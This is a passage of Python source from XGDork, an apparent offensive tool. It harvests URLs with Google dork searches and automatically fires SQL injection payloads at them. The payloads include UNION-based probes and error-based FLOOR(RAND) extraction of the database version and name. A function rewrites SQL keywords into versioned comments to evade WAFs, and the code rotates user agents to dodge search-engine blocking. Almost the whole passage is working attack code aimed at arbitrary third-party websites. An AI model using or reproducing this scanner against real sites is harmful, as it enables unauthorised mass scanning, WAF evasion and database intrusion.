Our systems have detected unusual traffic from your computer network.") > -1): 141 | print colored(" [!] Google Security Traffic page detected ! < Unusual Traffic >", 'red') 142 | print colored(" [*] Advice: Change your IP -or- wait 1/2 hours -or- Bypass this ! -or- Try with '-b 1'", 'blue') 143 | urls.append("!gsec!") 144 | return urls 145 | 146 | while (i < len(greq)-1): 147 | 148 | if (greq[i] == 'h' and bp == -1 or (bp > 0 and greq[i] == 'h' and greq[i+1] == 'r')): 149 | ca = i 150 | while (i < len(greq)-1 and greq[i] != ':'): 151 | i += 1 152 | cb = i 153 | tmp = block_cutter (greq, ca, cb) 154 | 155 | if (tmp == 'http:' or tmp == 'https:' or (bp > 0 and tmp == "href=\"http:") or (bp > 0 and tmp == "href=\"https:")): 156 | 157 | while (i < len(greq)-1 and greq[i] != ' '): 158 | i += 1 159 | cb = i 160 | if (bp > 0): 161 | url_found = block_cutter (greq, (ca+len("href=\"")), cb-2) 162 | else: 163 | url_found = block_cutter (greq, ca, cb) 164 | 165 | 166 | if (url_found.find('%252B') > -1): 167 | url_found = block_cutter (url_found, 0, url_found.find('%252B')-1) 168 | if (url_found.find('') > -1): 169 | url_found = block_cutter (url_found, 0, url_found.find('')-1) 170 | if (url_found.find('&') > -1): 171 | url_found = block_cutter (url_found, 0, url_found.find('&')-1) 172 | if (url_found.find('+') > -1): 173 | url_found = block_cutter (url_found, 0, url_found.find('+')-1) 174 | if (url_found.find(' ') > -1): 175 | url_found = block_cutter (url_found, 0, url_found.find(' ')-1) 176 | if (url_found.find('...') > -1): 177 | url_found = block_cutter (url_found, 0, url_found.find('...')-1) 178 | if (url_found.find('&L=') > -1): 179 | url_found = block_cutter(url_found, 0, url_found.find('&L=')-1) 180 | if (url_found.find('#') > -1): 181 | url_found = block_cutter(url_found, 0, url_found.find('#')-1) 182 | if (url_found.find('. -1): 183 | url_found = block_cutter(url_found, 0, url_found.find('. -1): 185 | url_found = block_cutter(url_found, 0, url_found.find('.') > -1): 188 | url_found = url_found.replace('', '') 189 | #if (url_found.find('') > -1): 190 | url_found = url_found.replace('', '') 191 | #if (url_found.find('"') > -1): 192 | url_found = url_found.replace('"', '') 193 | #if (url_found.find('
') > -1): 194 | url_found = url_found.replace('
', '') 195 | #if (url_found.find('
') > -1): 196 | url_found = url_found.replace('
', '') 197 | 198 | 199 | #if (url_found.find('%253F') > -1): 200 | url_found = url_found.replace('%253F', '') 201 | #if (url_found.find('%3F') > -1): 202 | url_found = url_found.replace('%3F', '?') 203 | #if (url_found.find('%253D') > -1): 204 | url_found = url_found.replace('%253D', '=') 205 | #if (url_found.find('%2526') > -1): 206 | url_found = url_found.replace('%2526', '&') 207 | #if (url_found.find('%3D') > -1): 208 | url_found = url_found.replace('%3D', '=') 209 | #if (url_found.find('%26') > -1): 210 | url_found = url_found.replace('%26', '&') 211 | 212 | 213 | if (url_found.find('.google.') == -1 and url_found.find('.gstatic.') == -1 and url_found.find('injection-sql') == -1 and url_found.find('sql-injection') == -1 and url_found.find('sql-injections') == -1 and url_found.find('sql-dorks') == -1 and url_found.find('dorks') == -1 and url_found.find('hack') == -1 and url_found.find('scribd') == -1 and url_found.find('pastebin') == -1 and url_found.find('stackoverflow') == -1 and url_found.find('over-blog') == -1 and url_found.find('github') == -1 and url_found.find('blogspot') == -1 and url_found.find('facebook') == -1 and url_found.find('moodle.') == -1 and url_found.find('openclassroom') == -1 and url_found.find('cracking.org') == -1 and url_found.find('websec.ca') == -1 and url_found.find('sql_injection') == -1 and url_found.find('injection_sql') == -1 and url_found.find('carding_dork') == -1 and url_found.find('carding-dork') == -1 and url_found.find('hacking') == -1 and url_found.find('vulnerability-lab.com') == -1): 214 | if ((url_found.find('http:') > -1 or url_found.find('https:') > -1) and url_found.find('=') > -1 and url_found.find('?') > -1 and url_found.find('ixquick-proxy.com') == -1 and url_found.find('forum.phpdebutant') == -1 and url_found.find('youtube.com') == -1 and url_found.find('startpage') == -1): 215 | urls.append(url_found) 216 | print (" [!] URL Found: "+url_found) 217 | #else: 218 | #print (" [*] URL Ignored: "+url_found) 219 | 220 | i += 1 221 | 222 | nurls = list(set(urls)) 223 | return nurls 224 | 225 | 226 | def sbws (string): 227 | 228 | string = string.replace(" ", "+") 229 | string = string.replace("UNION", "/*!50000UnIoN*/") 230 | string = string.replace("ORDER", "/*!50000OrDeR*/") 231 | string = string.replace("GROUP_CONCAT", "/*!50000GrOuP_CoNcAt*/") 232 | string = string.replace("CONCAT", "/*!50000CoNcAt*/") 233 | string = string.replace("CHAR", "/*!50000ChAr*/") 234 | string = string.replace("FROM", "/*!50000FrOm*/") 235 | string = string.replace("WHERE", "/*!50000WhErE*/") 236 | string = string.replace("RAND", "/*!50000RaNd*/") 237 | string = string.replace("FLOOR", "/*!50000FlOoR*/") 238 | string = string.replace("HEX", "/*!50000HeX*/") 239 | string = string.replace("UNHEX", "/*!50000UnHeX*/") 240 | string = string.replace("LIMIT", "/*!50000LiMiT*/") 241 | string = string.replace("ELT", "/*!50000ElT*/") 242 | string = string.replace("SLEEP", "/*!50000SlEeP*/") 243 | string = string.replace("SELECT", "/*!50000SeLeCt*/") 244 | string = string.replace("COUNT", "/*!50000CoUnT*/") 245 | string = string.replace("@@version", "/*!50000@@VeRsIoN*/") 246 | string = string.replace("version()", "/*!50000VeRsIoN()*/") 247 | string = string.replace("database()", "/*!50000DaTaBaSe()*/") 248 | string = string.replace("TABLE_NAME", "/*!50000TaBlE_NaMe*/") 249 | string = string.replace("COLUMN_NAME", "/*!50000CoLuMn_NaMe*/") 250 | string = string.replace("INFORMATION_SCHEMA.TABLES", "/*!50000InFoRmAtIoN_ScHeMa.TaBlEs*/") 251 | string = string.replace("INFORMATION_SCHEMA.COLUMNS", "/*!50000InFoRmAtIoN_ScHeMa.CoLuMnS*/") 252 | string = string.replace("INFORMATION_SCHEMA.PLUGINS", "/*!50000InFoRmAtIoN_ScHeMa.PlUgInS*/") 253 | string = string.replace("TABLE_SCHEMA", "/*!50000TaBlE_ScHeMa*/") 254 | string = string.replace("GROUP", "/*!50000GrOuP*") 255 | string = string.replace("LIKE", "/*!50000LiKe*/") 256 | string = string.replace("BY", "/*!50000By*/") 257 | string = string.replace("CONCAT_WS", "/*!50000CoNcAt_Ws*/") 258 | string = string.replace("HAVING", "/*!50000HaViNg*/") 259 | string = string.replace("MIN", "/*!50000MiN*/") 260 | string = string.replace("CAST", "/*!50000CaSt*/") 261 | string = string.replace("AS", "/*!50000As*/") 262 | string = string.replace("CHAR", "/*!50000ChAr*/") 263 | string = string.replace("AND", "/*!50000AnD*/") 264 | string = string.replace("OR", "/*!50000Or*/") 265 | 266 | return string 267 | 268 | 269 | 270 | 271 | def myParserSQLE (url, forcing, timeout, inject): 272 | 273 | lvl = 0 274 | terms_found = [] 275 | nterms = 0 276 | 277 | burl = "" 278 | nurl = "" 279 | data = "" 280 | waf = 0 281 | fo = 0 282 | tmp_version = "" 283 | tmp_ndatabase = "" 284 | payload= "" 285 | 286 | user_agent = rand_agent() 287 | headers = {'User-Agent': user_agent} 288 | 289 | wb_req = type(requests) 290 | 291 | try: 292 | 293 | #ForcingOpt 294 | if (forcing != '' and url.find(forcing) > -1 and focpa(url, forcing) != -1): 295 | print colored(" [!] Forcing - stress URL", 'cyan') 296 | fo = 1 297 | forcing = str(forcing) 298 | burl = focpa(url, forcing) 299 | nurl = burl 300 | nurl += "1984 AND CONCAT(CHAR(088,071,068,079,082,075,013,010))" 301 | if (timeout > 0.0): 302 | req = requests.get(nurl, headers=headers, timeout=timeout) 303 | else: 304 | req = requests.get(nurl, headers=headers) 305 | data = req.text.encode('utf-8') 306 | if (data.find("Mod_Security") > -1 or data.find("You don't have permission ") > -1): 307 | print colored(" [!] simple WAF Detected ! Others potential security ... ", 'red') 308 | waf = 1 309 | 310 | nurl = burl 311 | nurl += "-300 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,database(),156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300 --" 312 | if (waf == 1): 313 | nurl = sbws(nurl) 314 | if (timeout > 0.0): 315 | req = requests.get(nurl, headers=headers, timeout=timeout) 316 | else: 317 | req = requests.get(nurl, headers=headers) 318 | data = req.text.encode('utf-8') 319 | if (data.find('The used SELECT statements ') > -1): 320 | print colored(" [!] this technique is potentially feasible - ERROR-BASED -", 'green') 321 | print colored(" [*] Error potential : The used SELECT statements, Others errors ...", 'cyan') 322 | lvl += 10 323 | 324 | nurl = burl 325 | nurl += "777 ORDER BY 777 --" 326 | if (waf == 1): 327 | nurl = sbws(nurl) 328 | if (timeout > 0.0): 329 | req = requests.get(nurl, headers=headers, timeout=timeout) 330 | else: 331 | req = requests.get(nurl, headers=headers) 332 | data = req.text.encode('utf-8') 333 | if (data.find("Unknown column '") > -1 and data.find("' in 'order clause'") > -1 or data.find('mysql_num_rows():') > -1 or data.find('mysql_num_row():') > -1): 334 | print colored(" [!] this technique is potentially feasible - UNION-BASED - ", 'green') 335 | print colored(" [*] Error potential : Unknown column in 'order clause', mysql_num_rows():, mysql_num_row():, Others errors...", 'cyan') 336 | lvl += 10 337 | 338 | if (inject != '' and url.find(inject) > -1 and focpa(url, inject) != -1): 339 | print colored(" [!] Brutal Dump", 'cyan') 340 | inject = str(inject) 341 | burl = focpa(url, inject) 342 | if (fo == 0): 343 | nurl = burl 344 | nurl += "1984 AND CONCAT(CHAR(088,071,068,079,082,075,013,010))" 345 | if (timeout > 0.0): 346 | req = requests.get(nurl, headers=headers, timeout=timeout) 347 | else: 348 | req = requests.get(nurl, headers=headers) 349 | data = req.text.encode('utf-8') 350 | if (data.find("Mod_Security") > -1 or data.find("You don't have permission ") > -1): 351 | print colored(" [!] simple WAF Detected ! Others potential security ... ", 'red') 352 | waf = 1 353 | 354 | nurl = burl 355 | nurl += "1 OR 1984 GROUP BY CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,floor(rand(0)*2)) HAVING MIN(0) OR 1 --" 356 | if (waf == 1): 357 | nurl = sbws(nurl) 358 | if (timeout > 0.0): 359 | req = requests.get(url, headers=headers, timeout=timeout) 360 | else: 361 | req = requests.get(url, headers=headers) 362 | data = req.text.encode('utf-8') 363 | if (data.find("(^#^)") == -1): 364 | nurl = burl 365 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FL0OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 366 | if (waf == 1): 367 | nurl = sbws(nurl) 368 | if (timeout > 0.0): 369 | req = requests.get(nurl, headers=headers, timeout=timeout) 370 | else: 371 | req = requests.get(nurl, headers=headers) 372 | data = req.text.encode('utf-8') 373 | if (data.find("(^#^)") == -1): 374 | nurl = burl 375 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,version(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 376 | if (waf == 1): 377 | nurl = sbws(nurl) 378 | if (timeout > 0.0): 379 | req = requests.get(nurl, headers=headers, timeout=timeout) 380 | else: 381 | req = requests.get(nurl, headers=headers) 382 | data = req.text.encode('utf-8') 383 | 384 | tmp_version = str(parserDump(data, 1)) 385 | tmp_version = tmp_version.replace('[', '').replace(']', '').replace("'", '') 386 | 387 | nurl = burl 388 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 389 | if (waf == 1): 390 | nurl = sbws(nurl) 391 | if (timeout > 0.0): 392 | req = requests.get(nurl, headers=headers, timeout=timeout) 393 | else: 394 | req = requests.get(nurl, headers=headers) 395 | data = req.text.encode('utf-8') 396 | 397 | tmp_ndatabase = str(parserDump(data, 1)) 398 | tmp_ndatabase = tmp_ndatabase.replace('[', '').replace(']', '').replace("'", '') 399 | payload = nurl 400 | 401 | else: 402 | tmp_version = str(parserDump(data, 1)) 403 | tmp_version = tmp_version.replace('[', '').replace(']', '').replace("'", '') 404 | 405 | nurl = burl 406 | nurl += "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FL0OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --" 407 | if (waf == 1): 408 | nurl = sbws(nurl) 409 | if (timeout > 0.0): 410 | req = requests.get(nurl, headers=headers, timeout=timeout) 411 | else: 412 | req = requests.get(nurl, headers=headers) 413 | data = req.text.encode('utf-8') 414 | 415 | tmp_ndatabase = str(parserDump(data, 1)) 416 | tmp_ndatabase = tmp_ndatabase.replace('[', '').replace(']', '').replace("'", '') 417 | payload = nurl 418 | 419 | else: 420 | tmp_version = str(parserDump(data, 1)) 421 | tmp_version = tmp_version.replace('[', '').replace(']', '').replace("'", '') 422 | 423 | nurl = burl 424 | nurl += "1 OR 1984 GROUP BY CONCAT(0x28,0x5e,0x23,0x5e,0x29,database(),0x28,0x56,0x23,0x56,0x29,floor(rand(0)*2)) HAVING MIN(0) OR 1 --" 425 | if (waf == 1): 426 | nurl = sbws(nurl) 427 | if (timeout > 0.0): 428 | req = requests.get(nurl, headers=headers, timeout=timeout) 429 | else: 430 | req = requests.get(nurl, headers=headers) 431 | data = req.text.encode('utf-8') 432 | 433 | tmp_ndatabase = str(parserDump(data, 1)) 434 | tmp_ndatabase = tmp_ndatabase.replace('[', '').replace(']', '').replace("'", '') 435 | payload = nurl 436 | 437 | if (tmp_version == '' and tmp_ndatabase == ''): 438 | #print colored(" [-] Brutality not work ") 439 | pass 440 | else: 441 | print colored(" [*] Infos obtained brutally: ", 'green') 442 | print colored(" - [Version] "+tmp_version, 'yellow') 443 | print colored(" - [Database] "+tmp_ndatabase, 'yellow') 444 | print colored(" - [Payload] "+payload, 'yellow') 445 | lvl += 10 446 | 447 | 448 | if (timeout > 0.0): 449 | wb_req = requests.get(url, headers=headers, timeout=timeout) 450 | else: 451 | wb_req = requests.get(url, headers=headers) 452 | data = wb_req.text.encode('utf-8') 453 | 454 | 455 | 456 | #SFind 457 | if (data.find('MySQL') > -1): 458 | terms_found.append('MySQL') 459 | nterms += 1 460 | lvl += 1 461 | if (data.find('SQL') > -1): 462 | terms_found.append('SQL') 463 | nterms += 1 464 | lvl += 1 465 | if (data.find('SQL syntax') > -1): 466 | terms_found.append('SQL syntax') 467 | nterms += 1 468 | lvl += 3 469 | if (data.find('Warning:') > -1): 470 | terms_found.append('Warning:') 471 | nterms += 1 472 | lvl += 1 473 | if (data.find('Invalid argument supplied for') > -1): 474 | terms_found.append('Invalid argument supplied for') 475 | nterms += 1 476 | lvl += 1 477 | if (data.find('Notice: Undefined variable: ') > -1): 478 | terms_found.append('Notice: Undefined variable: ') 479 | nterms += 1 480 | lvl += 2 481 | if (data.find('supplied argument is not a valid MySQL result resource in') > -1): 482 | terms_found.append('supplied argument is not a valid MySQL result ressource in') 483 | nterms += 1 484 | lvl += 4 485 | if (data.find('valid MySQL result') > -1): 486 | terms_found.append('valid MySQL result') 487 | nterms += 1 488 | lvl += 5 489 | if (data.find('Incorrect syntax near') > -1): 490 | terms_found.append('Incorrect syntax near') 491 | nterms += 1 492 | lvl += 4 493 | if (data.find('Incorrect parameter count in the call to native function ') > -1): 494 | terms_found.append('Incorrect parameter count in the call to native function ') 495 | nterms += 1 496 | lvl += 4 497 | if (data.find('You have an error in your SQL syntax') > -1): 498 | terms_found.append('You have an error in your SQL syntax') 499 | nterms += 1 500 | lvl += 5 501 | if (data.find('Warning: mysql_num_rows(): ') > -1): 502 | terms_found.append('Warning: mysql_num_rows(): ') 503 | nterms += 1 504 | lvl += 5 505 | if (data.find('Warning: mysql_num_row(): ') > -1): 506 | terms_found.append('Warning: mysql_num_row(): ') 507 | nterms += 1 508 | lvl += 5 509 | if (data.find('Warning: mysql_fetch_array(): ') > -1): 510 | terms_found.append('Warning: mysql_fetch_array(): ') 511 | nterms += 1 512 | lvl += 4 513 | if (data.find('Warning: mysql_query(): ') > -1): 514 | terms_found.append('Warning: mysql_query(): ') 515 | nterms += 1 516 | lvl += 4 517 | if (data.find('Warning: mysql_result(): ') > -1): 518 | terms_found.append('Warning: mysql_result(): ') 519 | nterms += 1 520 | lvl += 4 521 | if (data.find('Warning: Unknown(): ') > -1): 522 | terms_found.append('Warning: Unknown(): ') 523 | nterms += 1 524 | lvl += 3 525 | if (data.find('Warning: array_merge(): ') > -1): 526 | terms_found.append('Warning: array_merge(): ') 527 | nterms += 1 528 | lvl += 3 529 | if (data.find('Warning: require(): ') > -1): 530 | terms_found.append('Warning: require(): ') 531 | nterms += 1 532 | lvl += 3 533 | if (data.find('MySQL Error: ') > -1): 534 | terms_found.append('MySQL Error: ') 535 | nterms += 1 536 | lvl += 3 537 | if (data.find('SQL Error: ') > -1): 538 | terms_found.append('SQL Error: ') 539 | nterms += 1 540 | lvl += 3 541 | if (data.find('Unable to jump to row') > -1): 542 | terms_found.append('Unable to jump to row') 543 | nterms += 1 544 | lvl += 2 545 | if (data.find('Session halted.') > -1): 546 | terms_found.append('Session halted.') 547 | nterms += 1 548 | lvl += 3 549 | if (data.find('Access denied for') > -1): 550 | terms_found.append('Access denied for') 551 | nterms += 1 552 | lvl += 2 553 | if (data.find('ODBC SQL Server Driver') > -1): 554 | terms_found.append('ODBC SQL Server Driver') 555 | nterms += 1 556 | lvl == 1 557 | if (data.find('argument should be an array in') > -1): 558 | terms_found.append('argument should be an array in') 559 | nterms += 1 560 | lvl += 4 561 | if (data.find(' expects parameter 1 to be resource, boolean given in ') > -1): 562 | terms_found.append('expects parameter 1 to be resource, boolean given in ') 563 | nterms += 1 564 | lvl += 3 565 | if (data.find('Warning: array_key_exists()') > -1): 566 | terms_found.append('Warning: array_key_exists()') 567 | nterms += 1 568 | lvl += 2 569 | if (data.find('Warning: parse_ini_file') > -1): 570 | terms_found.append('Warning: parse_ini_file') 571 | nterm += 1 572 | lvl += 2 573 | if (data.find('SAFE MODE Restriction in effect.') > -1): 574 | terms_found.append('SAFE MODE Restriction in effect.') 575 | nterms += 1 576 | lvl += 1 577 | 578 | 579 | 580 | if (lvl > 0 and lvl < 4): 581 | print colored(" [!] Vulnerable [!] ", 'green') 582 | print colored(" Parser Lvl : "+str(lvl)+" - Very Low", 'cyan') 583 | print colored(" Term(s) overview : <"+str(nterms)+"> "+str(terms_found).replace(',', ' <-> '), 'green') 584 | return lvl 585 | elif (lvl > 3 and lvl < 6): 586 | print colored(" [!] Vulnerable [!] ", 'green') 587 | print colored(" Parser Lvl : "+str(lvl)+" - Low", 'cyan') 588 | print colored(" Term(s) overview : <"+str(nterms)+"> "+str(terms_found).replace(',', ' <-> '), 'green') 589 | return lvl 590 | elif (lvl > 5 and lvl < 9): 591 | print colored(" [!] Vulnerable [!] ", 'green') 592 | print colored(" Parser Lvl : "+str(lvl)+" - Medium", 'cyan') 593 | print colored(" Term(s) overview : <"+str(nterms)+"> "+str(terms_found).replace(',', ' <-> '), 'green') 594 | return lvl 595 | elif (lvl > 8 and lvl < 15): 596 | print colored(" [!] Vulnerable [!] ",'green') 597 | print colored(" Parser Lvl : "+str(lvl)+" - Hight *Critical", 'cyan') 598 | print colored(" Term(s) overview : <"+str(nterms)+"> "+str(terms_found).replace(',', ' <-> '), 'green') 599 | return lvl 600 | elif (lvl > 14): 601 | print colored(" [!] Vulnerable [!] ", 'green') 602 | print colored(" Parser Lvl : "+str(lvl)+" - Legendary *Critical+", 'cyan') 603 | print colored(" Term(s) overview : <"+str(nterms)+"> "+str(terms_found).replace(',', ' <-> '), 'green') 604 | return lvl 605 | else : 606 | print colored(" [-] Grrr ...", 'red') 607 | return lvl 608 | 609 | except requests.exceptions.ConnectionError: 610 | #wb_req.status_code = "Connection refused" 611 | print colored(" [-] Request Error, ignored ... ", 'cyan') 612 | ##b_req.status_code = "Connection refused" 613 | except requests.exceptions.TooManyRedirects: 614 | #wb_req.status_code = "Connection refused" 615 | print colored(" [-] Request Error, ignored ... ", 'cyan') 616 | #wb_req.status_code = "Connection refused" 617 | except requests.exceptions.ReadTimeout: 618 | print colored(" [-] Request Timeout, ignored ... ", 'cyan') 619 | 620 | 621 | 622 | def marvin_ppa (url, out_file, forcing, timeout, inject, mores): 623 | 624 | i = 0 625 | c = 0 626 | surl = "" 627 | port = 80 628 | print colored("\n [Marvin Ppa] work on "+url, 'blue') 629 | if (mores == 1): 630 | while (i < len(url) and url[i] != ""): 631 | if (url[i] == '/' and i > 12): 632 | break 633 | i += 1 634 | c = i-1 635 | if (url.find("http://") > -1): 636 | surl = block_cutter(url, 7, c) 637 | elif (url.find("https://") > -1): 638 | surl = block_cutter(url, 8, c) 639 | tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 640 | tsock.connect((surl, port)) 641 | minfos = tsock.getpeername()[0] 642 | tsock.close() 643 | print colored(" [!] IP Overview: "+str(minfos), 'green') 644 | 645 | qurl = url+"%%2727" 646 | if (url.find('search.php?search_id=') > -1): 647 | qurl = block_cutter(url, 0, (url.find('search.php?search_id=')+len("search.php?search_id=")-1)) 648 | qurl += "1%%2727" 649 | 650 | if (myParserSQLE (qurl, forcing, timeout, inject) > 0): 651 | dump = open(out_file, 'a') 652 | dump.write(url+"\n") 653 | dump.close() 654 | return 1 655 | else: 656 | return 0 657 | 658 | 659 | def moulinette (urls, out_file, forcing, timeout, inject, mores): 660 | 661 | i = 0 662 | n = 0 663 | stress = 0 664 | 665 | while (i < len(urls)): 666 | #signal.signal(signal.SIGINT, signal_handler) 667 | stress = marvin_ppa (urls[i], out_file, forcing, timeout, inject, mores) 668 | #signal.pause() 669 | if (stress == 1): 670 | n += 1 671 | i += 1 672 | 673 | return n 674 | 675 | 676 | 677 | def search_engine (dork, n_page, out_file, bp, cdom, forcing, timeout, inject, mores): 678 | 679 | IP_PO = ipuser() 680 | print colored("\n [*] Public IP overview: "+IP_PO+"", 'blue') 681 | 682 | su_filter = "" 683 | urls_found = [] 684 | pvalue = 0 685 | i = 0 686 | ca = 0 687 | cb = 0 688 | 689 | tmplist1 = [] 690 | tmplistB = [] 691 | nosearch = 0 692 | breaker = 0 693 | x = 0 694 | 695 | if (len(dump_page(n_page)) > 1): 696 | pvalue = str(dump_page(n_page)[0]) 697 | pvalue = pvalue.replace("'", '') 698 | pvalue = pvalue.replace('[', '') 699 | pvalue = pvalue.replace(']', '') 700 | i = int(pvalue) 701 | if (i <= 0): 702 | i = 1 703 | 704 | pvalue = str(dump_page(n_page)[1]) 705 | pvalue = pvalue.replace("'", '') 706 | pvalue = pvalue.replace('[', '') 707 | pvalue = pvalue.replace(']', '') 708 | n_page = int(pvalue) 709 | 710 | else: 711 | pvalue = str(dump_page(n_page)) 712 | pvalue = pvalue.replace("'", '') 713 | pvalue = pvalue.replace('[', '') 714 | pvalue = pvalue.replace(']', '') 715 | i = 0 716 | n_page = int(pvalue) 717 | 718 | if (len(cdom) > 0): 719 | if (cdom[0] == '.'): 720 | cdom = block_cutter(cdom, 1, len(cdom)-1) 721 | 722 | print colored(" [*] GSE Crawling wait ...", 'cyan') 723 | 724 | #if (bp > 0): 725 | #user_agent = rand_agent() 726 | #headers = {'User-Agent': user_agent} 727 | 728 | #print colored("\n [+] User-Agent: "+user_agent, 'green') 729 | #nurl = "https://s10-eu4.startpage.com/do/search?cmd=process_search&language=english&prf=21334709fc6a498bfad2ed75d1597501&suggestOn=1&rcount=&rl=NONE&abp=1&t=night&query="+dork+"&cat=web&engine0=v1all&startat=0&nj=0" 730 | #print colored(" [*] Search SPGKey ...", 'cyan') 731 | #r = requests.get(nurl, headers=headers) 732 | #data = r.text.encode('utf-8') 733 | 734 | #if (data.find("\"qid\":") > -1): 735 | #ca = (data.find("\"qid\":")) 736 | #cb = ca 737 | #while (cb < (len(data)-1) and data[cb] != ','): 738 | #cb += 1 739 | #SPGKey = block_cutter(data, ca+7, cb-2) 740 | #print colored(" [!] SPGKey: "+SPGKey, 'green') 741 | 742 | #else: 743 | #print colored(" [*] ERROR SPGKey !", 'red') 744 | #exit(0) 745 | 746 | while (i <= n_page-1 and breaker == 0): 747 | if (breaker == 1): 748 | break 749 | 750 | g_page = str(i*10) 751 | 752 | user_agent = rand_agent() 753 | headers = {'User-Agent': user_agent} 754 | 755 | print colored("\n [] ", 'cyan') 756 | print colored(" [+] User-Agent: "+user_agent, 'green') 757 | 758 | if (bp > 0): 759 | 760 | time.sleep(randint(1, 3)) 761 | nurl = "https://s10-eu4.startpage.com/do/search?cmd=process_search&language=english&prf=21334709fc6a498bfad2ed75d1597501&suggestOn=1&qid=&rcount=&rl=NONE&abp=1&t=night&query="+dork+"&cat=web&engine0=v1all&startat="+g_page+"&nj=0" 762 | #"https://s10-eu4.startpage.com/do/search?cmd=process_search&language=english&prf=21334709fc6a498bfad2ed75d1597501&suggestOn=1&qid="+SPGKey+"&rcount=&rl=NONE&abp=1&t=night&query="+dork+"&cat=web&engine0=v1all&startat="+g_page+"&nj=0" 763 | 764 | else: 765 | time.sleep(randint(1, 3)) 766 | if (cdom != ''): 767 | print colored(" [+] Domain: "+cdom, 'green') 768 | nurl = "https://www.google."+cdom+"/search?q="+dork+"&start="+g_page+"&num=10&filter=0" 769 | else: 770 | nurl = "https://www.google.com/search?q="+dork+"&start="+g_page+"&num=10&filter=0" 771 | 772 | greq = requests.get(nurl, headers=headers) 773 | gdata = greq.text.encode('utf-8') 774 | 775 | tmplistA = myParserGSE (gdata, bp) 776 | 777 | if (nosearch >= 1): 778 | breaker = 1 779 | break 780 | if ((len(tmplistA)-1) == 0): 781 | nosearch += 1 782 | else: 783 | if ("!gsec!" in tmplistA == True): 784 | tmplistA = tmplistA.remove("!gsec!") 785 | breaker = 1 786 | break 787 | if (tmplistA == tmplistB and (len(tmplistA)-1) != 0): 788 | breaker = 1 789 | break 790 | 791 | nosearch = 0 792 | urls_found += tmplistA 793 | 794 | tmplistB = tmplistA 795 | 796 | i += 1 797 | x += 1 798 | 799 | 800 | urls_found = list(set(urls_found)) 801 | 802 | if ((len(urls_found)-1) > 0): 803 | print colored("\n [*] GSE Crawling finished, Marvin Ppa > \n", 'cyan') 804 | nbr = moulinette (urls_found, out_file, forcing, timeout, inject, mores) 805 | print colored("\n\n [!] URLs Saved: "+str(nbr)+" in '"+out_file+"' !", 'green') 806 | print colored(" [*] Verify if is not fake positive ! ... \n\n", 'red') 807 | 808 | else: 809 | print colored(" [!] List is empty, Marvin Ppa is not happy ... ", 'red') 810 | 811 | 812 | 813 | 814 | 815 | 816 | 817 | 818 | 819 | -------------------------------------------------------------------------------- /XGDork.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | # This program is a 'total' free software: you can redistribute it and/or modify - ViraX 4 | # You can quoted me as a source. 5 | 6 | import os 7 | import sys 8 | import time 9 | import requests 10 | from random import randint 11 | from termcolor import colored 12 | from XGDlib import search_engine, dump_page 13 | from XGDumper import MOCA 14 | from XGDtoolz import genDork, Ex 15 | 16 | argc = len(sys.argv) 17 | iargs = 1 18 | dump_module = 0 19 | 20 | data_ipo = -1 21 | data_dork = "" 22 | data_page = -1 23 | data_file = "" 24 | data_bypass = -1 25 | data_cdom = "" 26 | data_forcing = "" 27 | data_timeout = -1 28 | data_gdork = -1 29 | data_x = -1 30 | data_xkey = "" 31 | data_inject = "" 32 | data_mores = -1 33 | 34 | data_url = "" 35 | data_param = "" 36 | data_mod = 0 37 | data_table = "" 38 | data_fields = "" 39 | fields_list = [] 40 | 41 | while (iargs < argc): 42 | 43 | if (argc < 2): 44 | print colored("Params Error, please use XGDork.py --help ! \n", 'red') 45 | exit() 46 | 47 | if ((sys.argv[iargs] == '-h' or sys.argv[iargs] == '--help') and argc == 2): 48 | 49 | print colored("\n [XGDork - Scanner]", 'green') 50 | print (" USE : XGDork.py -d 'your_dork' -p 'page_number' -o 'out_file' \n") 51 | 52 | print (" -d or --dork 'your_dork' :add your dork, for search") 53 | print (" e,g: -d .php?id= ") 54 | print (" [OR] ") 55 | print (" -gd or --gendork :add a dork generated, for search") 56 | print (" e,g: -gd \n") 57 | 58 | print (" -cd or --cdomain 'your_custom_domain' :add custom google domain") 59 | print (" e,g: -cd .com \n") 60 | 61 | print (" -p or --page 'page_number' :add pages max 